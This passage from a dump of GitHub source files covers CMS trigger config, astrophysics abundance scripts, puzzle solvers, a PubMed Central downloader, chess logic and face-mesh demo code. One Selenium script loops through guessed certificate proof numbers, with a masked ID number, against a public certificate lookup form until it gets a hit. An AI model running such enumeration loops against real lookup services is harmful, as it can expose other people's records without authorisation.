)\n)\n\nL1TMuonEndCapParamsOnlineProd = cms.ESProducer(\"L1TMuonEndCapParamsOnlineProd\",\n onlineAuthentication = cms.string('.'),\n forceGeneration = cms.bool(True),\n onlineDB = cms.string('oracle://CMS_OMDS_LB/CMS_TRG_R'),\n transactionSafe = cms.bool(True) # nothrow guarantee if set to False: carry on no matter what\n)\n","repo_name":"cms-sw/cmssw","sub_path":"L1TriggerConfig/L1TConfigProducers/python/L1TMuonEndCapParamsOnline_cfi.py","file_name":"L1TMuonEndCapParamsOnline_cfi.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"26052220894","text":"from selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nimport time\n\n\"\"\"\nCreated by kuu-kie on 2022/06/04\n说明:\n程序依赖 Linux系统下,自带火狐浏览器\n运行环境 anaconda库,python3.8版本\n\n运行前请修改代码中的相应字符串\n\n代码说明:\nselenium为封装好的模拟键盘鼠标事件的库(需要pip install selenium)\n首先加载驱动,与火狐浏览器相连,驱动为GitHub上的开源包\n然后访问网页\n接着循环输入表单数据,提交,返回\n缺点:\n需要程序跑起来后一直盯着看,没有做找到后的break\ntime的作用就是适当的调一下速度\n\n更新V1:\n可以做到找到后break\n运行时可以把time.sleep去掉,直接飞速跑\n\"\"\"\n\nbrowser = webdriver.Firefox(executable_path=\"/home/kuukie/PycharmProjects/AutomaticClick/geckodriver-v0.31.0-linux64/geckodriver\")\nbrowser.get(\"https://www.miiteec.org.cn/plus/list.php?tid=247\")\n\nfor i in range(0, 1000):\n el1_s = Select(browser.find_element_by_id(\"kaoshi\"))\n el2_s = Select(browser.find_element_by_id(\"zhengshu\"))\n el3 = browser.find_element_by_id(\"identify\")\n el4 = browser.find_element_by_id(\"proof\")\n el5 = browser.find_element_by_id(\"submit\")\n\n el1_s.select_by_value(\"3\")\n el2_s.select_by_value(\"309\")\n el3.send_keys(\"370***********6629\")\n if i < 10:\n el4.send_keys(\"L210020100200\" + \"00\" + str(i))\n elif i < 100:\n el4.send_keys(\"L210020100200\" + \"0\" + str(i))\n else:\n el4.send_keys(\"L210020100200\" + str(i))\n el5.click()\n\n # time.sleep(0)\n\n el_r = browser.find_element_by_class_name(\"plist2_p\")\n result = False\n l_el_r = el_r.find_elements_by_xpath(\"div/label\")\n d_el_r = el_r.find_elements_by_xpath(\"div\")\n for label in l_el_r:\n result = True\n if result:\n for div in d_el_r:\n print(div.text)\n break\n browser.back()\n","repo_name":"kuukie-kq/HodgePodge","sub_path":"Cpycharm/automatic_click_html.py","file_name":"automatic_click_html.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71797175834","text":"import numpy as np\n\ndef makeAbun(solar_abun, abun_file, COratio, solar_times=1):\n \"\"\"\n Makes the abundaces file to be used by TEA.\n The function reads Asplund et al (2009) elemental abundances file\n http://adsabs.harvard.edu/abs/2009ARA%26A..47..481A, (abudances.txt),\n sets the C/O ratio as requested, and/or multiplies the abundances of metal\n elements (all except He and H) by the desired multiplication factor. \n The C/O ratio is set by fixing the O abundance to the solar value and\n changing the C elemental abundance so C/O ratio is as requested.\n\n Parameters\n ----------\n solar_abun: String\n Input Solar abundances filename.\n abun_file: String\n Output filename to store the modified elemental abundances.\n COratio: Float\n Desired C/O ratio.\n \n Optional parameters\n -------------------\n solar_times: Float\n Multiplication factor for metal elemental abundances (everything\n except H and He).\n\n Returns\n -------\n None\n\n Example\n -------\n solar_abun = 'abundances.txt'\n abun_file = 'CO1.2abun.txt'\n COratio = 1.2\n makeAbun(solar_abun, abun_file, COratio)\n\n Revisions\n ---------\n 2015-10-25 Jasmina Written by.\n \"\"\"\n\n\n # Read the elemental-abundances file:\n f = open(solar_abun, 'r')\n lines = f.readlines()\n f.close()\n\n # Count the number of elements:\n nelem = len(lines)\n for line in lines:\n if line.startswith(\"#\"):\n nelem -= 1\n\n # Allocate arrays to put information:\n index = np.zeros(nelem, int)\n symbol = np.zeros(nelem, '|S2')\n dex = np.zeros(nelem, np.double)\n name = np.zeros(nelem, '|S20')\n mass = np.zeros(nelem, np.double)\n\n # Store data into the arrays:\n i = 0\n for line in lines:\n if not line.startswith(\"#\"):\n index[i], symbol[i], dex[i], name[i], mass[i] = line.strip().split()\n i += 1\n\n # Count the number of elements:\n nelem = len(symbol)\n\n # Scale the metals aundances:\n imetals = np.where((symbol != \"H\") & (symbol != \"He\"))\n dex[imetals] += np.log10(solar_times)\n\n # Calculate C and O abundances based on C/O requested:\n Odex = dex[np.where(symbol == \"O\")]\n dex[np.where(symbol == \"C\")] = np.log10(COratio) + Odex\n \n # Save data to file\n f = open(abun_file, \"w\")\n # Write header\n f.write(\"# Elemental abundances:\\n\"\n \"# Columns: ordinal, symbol, dex abundances, name, molar mass.\\n\")\n # Write data\n for i in np.arange(nelem):\n f.write(\"{:3d} {:2s} {:5.2f} {:10s} {:12.8f}\\n\".format(\n index[i], symbol[i], dex[i], name[i], mass[i]))\n f.close()\n\n","repo_name":"dzesmin/TEA","sub_path":"scripts/makeAbun.py","file_name":"makeAbun.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"50"} +{"seq_id":"39446586282","text":"def triplet_skip(word, i):\n\t\"\"\"Takes a string and an i as input and returns a string made up\n\tof a triplet of every other character starting at i\"\"\"\n\n\treturn word[i] + word[i + 2] + word[i + 4]\n\ndef triple_consecutive_letters(word):\n\t\"\"\"Takes a word as input and outputs true is that word contains three\n\tconsecutive double letters\"\"\"\n\n\t# If a word has three consecutive double letters, then a series of three letters\n\t# skipping every letter would be the same starting at i and i+1\n\tfor i in range(len(word) - 5):\n\t\t if triplet_skip(word, i) == triplet_skip(word, i + 1):\n\t\t \treturn True\n\n\treturn False\n\nfin = open(\"words.txt\")\nfor line in fin:\n\tif triple_consecutive_letters(line.strip()):\n\t\tprint(line.strip())","repo_name":"AHKerrigan/Think-Python","sub_path":"exercise9_7.py","file_name":"exercise9_7.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19108394660","text":"import re\nt = int(input())\nfor z in range(t) :\n\tn,m,x = input().split(\" \")\n\tn,m,x = int(n),int(m),int(x)\n\tnumber_string = '1'\n\tmax_number = '9'\n\tfor i in range(n-1) :\n\t\tnumber_string += '0'\n\t\tmax_number += '9'\n\tstart_number = ''\n\tfor l in range(int(number_string) , int(max_number) + 1 ) :\n\t\tif l % m == 0 :\n\t\t\tstart_number = str(l)\n\t\t\tbreak;\n\tprohibited = []\n\tfor l in range(x):\n\t\ta,b = input().split()\n\t\tprohibited.append(a+b)\n\t\tprohibited.append(b+a)\n\n\t# print (prohibited)\n\tanswer = 0\n\tfor l in range(int(start_number),int(max_number) + 1, m) :\n\t\tflag = 0\n\t\tfor i in range(len(prohibited)) :\n\t\t\tif (re.search(prohibited[i],str(l))) :\n\t\t\t\tflag = 1\n\t\t\t\tbreak\n\t\tif flag == 0 :\n\t\t\tanswer += 1\n\t\t\tanswer = answer % 1000000007\n\n\tprint (answer)\n\n\t\t\n\n\n\n","repo_name":"msrshahrukh100/Iqra","sub_path":"GFG/madstreet2.py","file_name":"madstreet2.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1683693700","text":"from config.config import *\r\nfrom utils.utils import *\r\n\r\n\r\nclass Game:\r\n def __init__(self, sess, avp_net, vsp_net):\r\n self.avp_net = avp_net\r\n self.vsp_net = vsp_net\r\n self.max_depth = FLAGS.max_depth\r\n self.action_num = FLAGS.action_num\r\n self.sess = sess\r\n self.saver = tf.train.Saver()\r\n # initialize the network\r\n self.sess.run(tf.global_variables_initializer())\r\n\r\n def get_game_ended(self, level, img):\r\n if level != self.max_depth:\r\n return 0\r\n else:\r\n _, v = self.avp_net.predict(img)\r\n return v\r\n\r\n def get_next_state(self, s, a):\r\n\r\n return self.vsp_net.predict(s, a)\r\n\r\n @staticmethod\r\n def format_steer_angle(w):\r\n w = int((w + 1) / 0.2)\r\n if w == 10:\r\n w = 9\r\n return w\r\n\r\n def train_net(self, train_examples):\r\n train_times = int(FLAGS.train_interval / FLAGS.vsp_batch_size)\r\n # train avp and vsp network\r\n for _ in range(train_times):\r\n sample_index = np.random.choice(FLAGS.train_interval - 1, FLAGS.avp_batch_size)\r\n state_batch = []\r\n next_state_batch = []\r\n a_batch = []\r\n\r\n obs_batch = []\r\n p_batch = []\r\n v_batch = []\r\n for i in range(FLAGS.avp_batch_size):\r\n # coach.last_state, coach.last_pi, r, coach.last_a\r\n obs_batch.append(train_examples[sample_index[i]][0])\r\n p_batch.append(train_examples[sample_index[i]][1])\r\n next_state = train_examples[sample_index[i] + 1][0]\r\n _, tmp_v = self.avp_net.predict(next_state)\r\n v_batch.append(train_examples[sample_index[i]][2]+FLAGS.gmma*tmp_v)\r\n\r\n state_batch.append(train_examples[sample_index[i]][0])\r\n tmp = np.zeros((1,))\r\n tmp[0] = train_examples[sample_index[i]][-1]\r\n a_batch.append(tmp)\r\n next_state_batch.append(train_examples[sample_index[i] + 1][0])\r\n\r\n loss_vsp = self.vsp_net.learn(state_batch, a_batch, next_state_batch)\r\n loss_avp = self.avp_net.learn(p_batch, v_batch, obs_batch)\r\n print('loss_vsp:', round(loss_vsp, 5), 'loss_avp:', round(loss_avp, 5))\r\n\r\n def save_ckpt(self):\r\n self.saver.save(self.sess, 'ckpt/model.ckpt')\r\n","repo_name":"winds-line/deep-MCTS","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2389,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"50"} +{"seq_id":"6651653031","text":"import discord\r\nimport re\r\n\r\n\r\ndef format_display_name(display_name: str, illegal_strings=('👉', '👑', ':crown:', ':point_right:')):\r\n formatted = display_name[:20]\r\n if len(display_name) > 20:\r\n formatted += '...'\r\n for illegal_string in illegal_strings:\r\n formatted = formatted.replace(illegal_string, '💩')\r\n return formatted\r\n\r\n\r\ndef get_score_user_info(user, score_pos: int):\r\n formatted_name = format_display_name(user[\"display_name\"])\r\n points = int(user[\"challenges_solved\"]) * 10\r\n ret_str = f'#{score_pos+1} {formatted_name} - {points} poeng'\r\n\r\n if user[\"eggs_solved\"] == \"0\":\r\n ret_str += '\\n'\r\n else:\r\n ret_str += f' og ⭐ x {user[\"eggs_solved\"]}\\n'\r\n \r\n return ret_str\r\n\r\n\r\ndef get_max_score_users(score):\r\n highest_score = [score[0][\"challenges_solved\"], score[0][\"eggs_solved\"]]\r\n\r\n for x, user in enumerate(score):\r\n user_score = [user[\"challenges_solved\"], user[\"eggs_solved\"]]\r\n if user_score != highest_score:\r\n return x\r\n\r\n\r\nasync def get_scoreboard_embed(scoreboard, input_users=()):\r\n if scoreboard is None:\r\n return discord.Embed(\r\n title=\"FEIL\",\r\n color=0xff0000,\r\n description=\"Det oppsto en feil!\\nKlarte ikke å hente scoreboardet.\"\r\n )\r\n\r\n embed_description = \"\"\r\n embed_finished = False\r\n scoreboard_users = 0\r\n for x, user in enumerate(scoreboard):\r\n if len(input_users) > 0:\r\n for input_user in input_users:\r\n if input_user.lower() in user['display_name'].lower():\r\n embed_description += get_score_user_info(user, x)\r\n scoreboard_users += 1\r\n if scoreboard_users >= 15:\r\n embed_description += '...'\r\n embed_finished = True\r\n break\r\n else:\r\n scoreboard_users += 1\r\n embed_description += get_score_user_info(user, x)\r\n if scoreboard_users >= 15:\r\n max_score_users = get_max_score_users(scoreboard)\r\n embed_description += f'...\\n\\n{max_score_users}/{len(scoreboard)} alvebetjenter har maks poeng'\r\n\r\n embed_finished = True\r\n\r\n if embed_finished:\r\n break\r\n\r\n if embed_description == '':\r\n return discord.Embed(title='FEIL', color=0x50bdfe, description='Brukeren ble ikke funnet!')\r\n\r\n return discord.Embed(title='Poengoversikt', color=0x50bdfe, description=embed_description)\r\n\r\n\r\ndef render_mail(mail):\r\n message_content = f\"~~{' ' * 200}~~\\n\"\r\n message_content += f\"Sent: [{mail['sent']}]\\n\"\r\n message_content += f\"From: [{mail['from']}]\\n\"\r\n message_content += f\"To: [{', '.join([to.replace('{{display_name}}', 'YOU') for to in mail['to']])}]\\n\"\r\n message_content += f\"Subject: {mail['subject']}\\n\"\r\n mail_content = mail['content']\r\n for result in re.finditer(r'(\\[.*\\]\\((.*)\\))', mail_content):\r\n mail_content = mail_content.replace(result.groups(0)[0], f\"https://dass.npst.no{result.groups(0)[1]}\")\r\n message_content += mail_content\r\n return message_content\r\n","repo_name":"jotjern/DASS-Betjent","sub_path":"NPST_utils.py","file_name":"NPST_utils.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"13902031474","text":"import os\nimport sys\nimport cv2\nimport random \nimport pathlib\nimport numpy as np\n\nif __name__ == '__main__':\n # loop through objects\n obstacle_arr=[]\n dirs = os.listdir('objects')\n for x in dirs:\n if str(os.path.splitext(x)[1]) == \".jpg\":\n obstacle_arr.append(x)\n\n for obstacle_src in obstacle_arr:\n # open url with opencv\n bg = cv2.imread('game-snapshots/full_snap__bg.jpg')\n obstacle = cv2.imread('objects/'+obstacle_src)\n bg_width, bg_height, _ = bg.shape\n obstacle_width, obstacle_height, _ = obstacle.shape\n\n for i in range(1,1000):\n # random coordinates\n x=random.randint(0, bg_width-obstacle_width-50)\n y=random.randint(0, bg_height-obstacle_height-50)\n while x+obstacle_width+50>bg_width or y+obstacle_height+50>bg_height:\n x=random.randint(0, bg_width-obstacle_width-50)\n\n try:\n # img size 76x103\n img_crop=bg[x:x+obstacle_width+50, y:y+obstacle_height+50]\n\n obstacle_name=str(os.path.splitext(obstacle_src)[0])\n savepath='neg-'+obstacle_name + \"/bg-\" + obstacle_name + \"-\" + str(i) + \".jpg\"\n\n # check if folder exists\n obstacle_directory = pathlib.Path('objects/neg-'+obstacle_name)\n if obstacle_directory.exists()==False:\n os.mkdir('objects/neg-'+obstacle_name)\n\n # save background\n cv2.imwrite('objects/'+savepath, img_crop)\n with open('objects/'+obstacle_name+'.txt', 'a') as f:\n f.write(savepath+'\\n')\n print(savepath)\n except Exception as e:\n print(str(e))","repo_name":"agustinustheo/gojek-game-ann","sub_path":"background_generate_script.py","file_name":"background_generate_script.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"12407739159","text":"Q = int(input())\nqueries = [list(input().split()) for i in range(Q)]\nS = \"\"\n# print(queries)\nfor q in queries:\n if q[0] == \"1\":\n input_str = str(q[1])\n S += input_str * int(q[2])\n else:\n slice_int = int(q[1])\n deleteS = S[:slice_int]\n S = S[slice_int:]\n delDict = {}\n for x in range(len(deleteS)):\n delDict[deleteS[x]] = 0\n for x in range(len(deleteS)):\n delDict[deleteS[x]] += 1\n delSum = 0\n for v in delDict.values():\n delSum += v**2\n print(delSum)\n","repo_name":"ritzcr/AtCoder","sub_path":"past2/g.py","file_name":"g.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9351304674","text":"#!/usr/bin/env python3\nimport queue\nimport threading\nimport urllib.request as urlr\nimport xml.etree.ElementTree as etree\nimport PubMedDB\nimport argparse\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport os\n\nFUNCTION = '''\nDownload free full text from PMC.\n'''\nINFO = '''Copyright wzlnot@gmail.com All Rights Reserved. \\\nLicensed under the MIT License'''\nTRYTIMES = 10\n\n\ndef cbk(a, b, c):\n per = 100.0 * a * b / c\n if per > 100:\n per = 100\n print('%.2f%%' % per)\n\n\ndef query_pmcid(DBSession):\n query_session = DBSession()\n pmcids = [str(i[0]) for i in query_session.query(\n PubMedDB.PM_to_PMC.pmcid).all()]\n query_session.close\n return pmcids\n\n\nclass downloader(object):\n def __init__(self, pmcid, store_path):\n self.pmcid = pmcid\n self.store_path = store_path\n\n def work(self):\n # url: https://www.ncbi.nlm.nih.gov/pmc/utils/oa/oa.fcgi?id=PMC13901\n baseurl = 'https://www.ncbi.nlm.nih.gov/pmc/utils/oa/oa.fcgi?id='\n resp = urlr.urlopen(baseurl + self.pmcid).read().decode(\n 'utf-8', errors='ignore')\n tree = etree.fromstring(resp)\n try:\n durl = tree[2][0][0].attrib['href']\n urlr.urlretrieve(\n durl, self.store_path + '/{0}.tar.gz'.format(self.pmcid))\n print(\"Download: {0} finished\".format(self.pmcid))\n except:\n print('{0} not in NCBI oa_package'.format(self.pmcid))\n\n\nclass downloadTASK(threading.Thread):\n def __init__(self, myqueue):\n self.queue = myqueue\n super(downloadTASK, self).__init__()\n\n def run(self):\n while True:\n if self.queue.qsize() > 0:\n self.queue.get().work()\n else:\n break\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=FUNCTION, epilog=INFO,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('-d', '--database', type=str,\n help='postgrel database', required=True)\n parser.add_argument('-P', '--PATH', type=str, required=True,\n help='PATH to store the full text')\n parser.add_argument('-p', '--process', type=int, default=4,\n help='thread number')\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n if not os.path.exists(args.PATH):\n os.mkdir(args.PATH)\n db = args.database\n engine = create_engine('postgresql://parser:parser@localhost/' + db)\n DBSession = sessionmaker(bind=engine)\n myqueue = queue.Queue(0)\n for i in query_pmcid(DBSession):\n s_download = downloader(i, args.PATH)\n myqueue.put_nowait(s_download)\n threads = []\n for i in range(args.process):\n thread = downloadTASK(myqueue)\n# thread.start()\n threads.append(thread)\n for thread in threads:\n thread.start()\n for thread in threads:\n thread.join()\n","repo_name":"meng-ma-biomedical-AI/BioNLP_Gene_Mutation","sub_path":"Tools/PubMed/PMCresource.py","file_name":"PMCresource.py","file_ext":"py","file_size_in_byte":3099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"37126641544","text":"import sys\nfrom pathlib import Path\npath_root = Path(__file__).parents[2]\nsys.path.append(str(path_root))\n\nfrom utils.get_inputs import ProblemParser\n\n\nlines = ProblemParser().load_input(2021, 15)\nnums = [[] for _ in range(len(lines))]\nfor i, line in enumerate(lines):\n for c in line:\n nums[i].append(int(c))\n\ndef part1():\n dp = [[0 for _ in range(len(nums[0]))] for _ in range(len(nums))]\n for i in range(len(nums[0])):\n for j in range(len(nums)):\n if i == 0 and j == 0:\n dp[i][j] = 0\n elif i-1 > 0 and j - 1 > 0:\n dp[i][j] = nums[i][j] + min(dp[i-1][j], dp[i][j-1])\n elif i-1 > 0:\n dp[i][j] = nums[i][j] + dp[i-1][j]\n else:\n dp[i][j] = nums[i][j] + dp[i][j-1]\n\n print(dp[len(nums[0]) - 1][ len(nums) - 1] - nums[0][0])\n\n\ndef expand_grid(g, n):\n expanded = []\n for bump in range(n * 2):\n temp = [[0 for _ in range(len(g[0]))] for _ in range(len(g))]\n for i in range(len(g[0])):\n for j in range(len(g)):\n val = (g[i][j] + (bump + 1))\n if val >= 10:\n val = val - 10 + 1\n temp[i][j] = val\n expanded.append(temp)\n app = []\n for i in range(n):\n for j in range(len(g)):\n g[j].extend(expanded[i][j])\n for i in range(n):\n curr = expanded[i: i + n + 1]\n temp = curr[0]\n for i in range(1, n + 1):\n for j in range(len(temp)):\n temp[j].extend(curr[i][j])\n app.append(temp)\n print(app)\n for a in app:\n g.extend(a)\n return g\n\n\ndef part2():\n expand_grid(nums, 4)\n for num in nums:\n print(num)\n dp = [[0 for _ in range(len(nums[0]))] for _ in range(len(nums))]\n for i in range(len(nums[0])):\n for j in range(len(nums)):\n if i == 0 and j == 0:\n dp[i][j] = 0\n elif i-1 > 0 and j - 1 > 0:\n dp[i][j] = nums[i][j] + min(dp[i-1][j], dp[i][j-1])\n elif i-1 > 0:\n dp[i][j] = nums[i][j] + dp[i-1][j]\n else:\n dp[i][j] = nums[i][j] + dp[i][j-1]\n\n print(dp[len(nums[0]) - 1][ len(nums) - 1] - nums[0][0])\npart1()\npart2()","repo_name":"kendallm/advent-of-code","sub_path":"2021/solutions/day15.py","file_name":"day15.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"9041266035","text":"class Solution(object):\n def numSquares(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n def helper(n, dp):\n i = int(n ** 0.5)\n res = float('inf')\n while i > 0:\n res = min(dp[n - (i * i)] + 1, res)\n i -= 1\n return res\n\n dp = [0, 1]\n for i in range(2, n + 1):\n dp.append(helper(i, dp))\n return dp[n]\n \n def sample(self, n):\n dp = [0]\n perfectSq = [pow(i,2) for i in range(1, int(sqrt(n))+1)]\n while len(dp) < n+1:\n dpI = inf\n for ps in perfectSq:\n if len(dp) startY:\n step = 1\n else:\n step = -1\n for i in range(startY+step, endY, step):\n line.append(strC(i, startX))\n\n # straight Y axis\n elif startY == endY:\n if endX > startX:\n step = 1\n else: \n step = -1\n for i in range(startX+step, endX, step):\n line.append(strC(startY, i))\n\n # diagonal \n\n elif abs(startX - endX) == abs(startY - endY):\n \n if endX > startX:\n stepX = 1\n else:\n stepX = -1\n if endY > startY:\n stepY = 1\n else:\n stepY = -1\n\n for i in range(startX+stepX, endX, stepX):\n startY += stepY\n line.append(strC(startY, i))\n\n\n return line\n\ndef isPinned(piece,turn,board):\n pieceX = int(piece[1])\n pieceY = int(piece[0])\n pieceName = board[pieceY][pieceX]\n availableMoves = []\n isPiecePinned = False\n if pieceName.lower() != 'k':\n\n # i will get the attackers on the king, then remove the piece and compare, does the attackers add? if yes that means it should be pinned\n oisCheck, okingMoves, okingCords, oattackerPieces= isKingOnCheck(board, turn)\n\n board[pieceY][pieceX] = ''\n\n nisCheck, nkingMoves, nkingCords, nattackerPieces = isKingOnCheck(board, turn)\n\n board[pieceY][pieceX] = pieceName\n\n if len(oattackerPieces) ==len( nattackerPieces):\n availableMoves = None\n else:\n pinner = list(set(nattackerPieces) - set(oattackerPieces))[0][1]\n pinner = strC(pinner[0],pinner[1])\n pieceMoves = getLegalMoves(piece, board)\n line = getLine(piece, pinner)\n line.append(pinner)\n for move in pieceMoves:\n if move in line:\n availableMoves.append(move)\n isPiecePinned = True\n return availableMoves\n\n\ndef isCheckmated(color,attackerPieces,board,kingCords):\n checkMate = True\n if len(attackerPieces) > 1:\n checkMate = True\n friendlyPieces = []\n for row in range(8):\n for col in range(8):\n if sameColor(color, board[row][col]):\n friendlyPieces.append((board[row][col],strC(row,col)))\n \n for piece in friendlyPieces:\n\n moves = getOutOfCheck(piece[1], attackerPieces, board, kingCords)\n if moves != []:\n checkMate = False\n break\n return checkMate\n\ndef isStaleMate (color,board):\n staleMate = True\n friendlyPieces = []\n for row in range(8):\n for col in range(8):\n if sameColor(color, board[row][col]):\n friendlyPieces.append((board[row][col],strC(row,col)))\n\n for piece in friendlyPieces:\n if piece[0].lower() == 'k':\n continue\n moves = getLegalMoves(piece[1], board)\n if moves !=[]:\n staleMate = False\n break\n return staleMate\n\ndef isDraw(board,color):\n friendlyPieces = []\n opponentPieces = []\n for row in range(8):\n for col in range(8):\n if sameColor(color, board[row][col]):\n friendlyPieces.append((board[row][col],strC(row,col)))\n if oppositeColor(color, board[row][col]):\n opponentPieces.append((board[row][col],strC(row,col)))\n\n\n if len(friendlyPieces) == 1 and len(opponentPieces)== 1:\n return True\n friendlyStatus = False\n if len(friendlyPieces) == 2 :\n if len(opponentPieces) ==2:\n for piece in friendlyPieces:\n if 'n' == piece[0].lower or 'b' == piece[0].lower():\n friendlyStatus = True\n if friendlyStatus:\n for piece in opponentPieces:\n if 'n' == piece[0].lower or 'b' == piece[0].lower():\n return True\n if len(opponentPieces) == 1:\n for piece in friendlyPieces:\n if 'n' == piece[0].lower or 'b' == piece[0].lower():\n return True \n if len(friendlyPieces) == 1 and len(opponentPieces) == 2:\n for piece in opponentPieces:\n if 'n' == piece[0].lower or 'b' == piece[0].lower():\n return True \n","repo_name":"sohyp3/chessGame","sub_path":"game/checkCheck.py","file_name":"checkCheck.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"27338342060","text":"import os\nimport cv2\nimport argparse\n\nfrom medface3D.face_mesh_reconstruction import FaceMeshGenerator\nfrom utils.visualize import save_images_as_gif, get_depth_map\nfrom utils.render_mesh import render_mesh, render_rotate_mesh\nfrom utils.transform import get_3D_point_cloud\n\ndef main():\n # Parse command-line arguments\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--folder', default='data/sample' , help='path to sample folder image')\n parser.add_argument('-l', '--max_loop', type=int, default= 2, help='max loop to reconstruct 3D face mesh')\n parser.add_argument('-p', '--point_cloud', action=\"store_true\", default=True, help='get image result as point cloud')\n parser.add_argument('-d', '--depth_scale', action=\"store_true\", default=False, help='depth scale for depth value')\n\n\n args = parser.parse_args()\n\n files = os.listdir(args.folder) \n\n for _, file in enumerate(files):\n if file.split('.')[-1] not in ['jpg', 'png']:\n continue\n\n path_read = f'{args.folder}/{file}'\n image = cv2.imread(path_read)\n _, w, _ = image.shape\n\n detector = FaceMeshGenerator(max_loop = args.max_loop)\n input_image = image.copy()\n output_image, face_detected, points, depth_list, triangles = detector.generate_face_mesh(input_image, args.point_cloud, args.depth_scale)\n \n if face_detected:\n list_view = []\n list_view.append(image)\n list_view.append(output_image)\n \n depth_map = get_depth_map(input_image, points, triangles.simplices, depth_list)\n list_view.append(depth_map)\n\n point_cloud_data = get_3D_point_cloud(points, depth_list, w)\n mesh_image = render_mesh(image, point_cloud_data)\n list_view.append(mesh_image)\n \n view_face = render_rotate_mesh(image, point_cloud_data)\n list_view.extend(view_face)\n\n save_images_as_gif(list_view, f'{args.folder}/{file}_face_reconstruction.gif')\n\n else: print(f'No face detected in is image')\nif __name__ == '__main__':\n # Example usage:\n main()\n","repo_name":"nguyentrongvan/MedFace3D","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"874791948","text":"import math\n\nfrom pyquiz.common.TreeNode import TreeNode\n\n\nclass MinimalTree:\n \"\"\"\n Minimal Tree: Given a sorted (increasing order) array with unique integer elements,\n write an algorithm to create a binary search tree with minimal height.\n Solution: use idea find a median, it is a root node. Repeat recursively for left/right parts\n \"\"\"\n\n def create_bst(self, items: []):\n return self.create_bst_part(items, 0, len(items))\n\n def create_bst_part(self, items: [], start, end):\n # Parent node will be a median of items\n im = math.floor(start + (end - start) / 2)\n node = TreeNode(items[im], None, None)\n # Recursive call to fill left/right children of BST\n if im > start:\n node.left = self.create_bst_part(items, start, im)\n if end > im + 1:\n node.right = self.create_bst_part(items, im, end)\n return node\n","repo_name":"DmitryPukhov/pyquiz","sub_path":"pyquiz/ctci/treesandgraphs/MinimalTree.py","file_name":"MinimalTree.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42726662024","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport socket\nfrom multiprocessing import Pool\n\nHOST = \"localhost\"\nPORT = 8001\nBUFFER_SIZE = 1024\n\ndef proxyClient(address):\n host = 'www.google.com'\n port = 80\n payload = 'GET / HTTP/1.0\\r\\nHost: '+host+'\\r\\n\\r\\n'\n buffer_size = 4096\n\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(address)\n s.sendall(payload.encode())\n s.shutdown(socket.SHUT_WR)\n\n full_data = s.recv(BUFFER_SIZE)\n print(full_data)\n except Exception as e:\n print(e)\n finally:\n s.close()\n\n\ndef main():\n address = [('127.0.0.1', 8001)]\n with Pool() as p:\n p.map(proxyClient, address * 10)\n\nif __name__ == \"__main__\":\n main()","repo_name":"TaraYu/cmput404lab2","sub_path":"multi_proxy_client.py","file_name":"multi_proxy_client.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74343652635","text":"#!/usr/bin/env python\nimport psycopg2\n\ndef stats_bibli(conn):\n choice = '1'\n choices = ['1', '2', '3']\n while choice in choices:\n print(\"\\n Statistiques sur la bibliotheque \")\n print(\"1 : Affichage age moyen des adhérents \")\n print(\"2 : Affichage de la ressource la plus populaire\")\n print(\"3 : Nombre total de prêts\")\n\n print(\"Pour sortir, entrez autre chose\")\n choice = input()\n\n if choice == '1':\n Age_moyen_adherent(conn)\n\n if choice == '2':\n Ressource_populaire(conn)\n \n if choice == '3':\n Nb_total_prets(conn)\n\ndef Age_moyen_adherent(conn):\n\n cur = conn.cursor()\n sql ='SELECT AVG(age(Utilisateur.date_naissance)) AS age_moy FROM Utilisateur'\n cur.execute(sql)\n row = cur.fetchone()\n print(\"\\n> Age moyen des adhérents :\", row[0]);\n\n\ndef Ressource_populaire(conn): #affiche la ressource la plus populaire\n\n#affichage de la liste de toutes les ressources avec leurs nombres de prets\n cur = conn.cursor()\n sql = \"SELECT id, nombre_emprunts FROM Emprunts_par_ressource\"\n cur.execute(sql)\n raw = cur.fetchone()\n id = raw[0]\n nombre_emprunts = raw[1]\n#CREATE 